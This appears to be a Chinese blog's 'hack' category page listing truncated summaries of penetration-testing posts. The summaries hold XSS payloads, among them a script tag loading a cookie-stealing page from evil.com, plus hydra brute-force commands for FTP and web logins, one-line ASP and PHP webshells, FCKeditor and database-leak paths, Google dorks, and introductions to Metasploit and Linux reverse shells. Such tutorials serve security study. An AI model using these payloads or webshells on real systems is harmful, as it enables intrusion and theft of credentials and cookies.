随笔分类 - hack
摘要:1.<script> alert(1);</script> 2.<script>alert('xss');</script> 3.<script src="http://www.evil.com/cookie.php"></script> 4.<script>location.href="http:
阅读全文
摘要:破解ftp:# hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV# hydra ip ftp -l 用户名 -P 密码字典 -e ns -vVget方式提交,破解web登录:# hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ht
阅读全文
摘要:一句话木马 asp:<%eval request("heroes")%> php:<?php @eval($_POST[value]);?> asp:<%@ Page Language="Jscript"%> <%eval(Request.Item["value"])%> 一句话木马制作: c32:
阅读全文
摘要:1、查看编辑器版本 /fckeditor/editor/dialog/fck_about.html 2、爆绝对路径 FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的
阅读全文
摘要:网页自动跳转: <meta http-equiv="refresh" content="5;url=http://baidu.com" /> 暴库利用方法: /inc/conn.asp 中有连接数据库的路径信息 to parent directory 去父路径 直接下载数据库,搜索: intext:
阅读全文
摘要:DNS收集 域名 -> IP whois查询:简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期等)。查出来的信息,比如注册人,邮箱,电话号码还可以继续用于查询同一个注册人注册的其他网站。 查询网址:http://whois
阅读全文
摘要:0x 01 GoogleHack语法 Site 指定域名 Intext 正文中出现关键字的网页 Intitle 标题中出现关键字的网页 Info 一些基本信息包含关键字的网页 Inurl url中存在关键字的网页 Filetype 指定文件类型 Cache Google搜索缓存的网页副本 常见操作符
阅读全文
摘要:1、 使用nmap进行端口扫描 2、 使用search命令查找相关模块 3、 使用use调度模块 4、 使用info查看模块信息 5、 选择payload作为攻击 6、 设置攻击参数 7、 渗透攻击 如果第二次看我文章,建议通过以上七个步骤回忆操作,实在记不住再看后面步骤详解,以达到掌握的效果。 详
阅读全文
摘要:前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得
阅读全文
摘要:今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的
阅读全文
浙公网安备 33010602011771号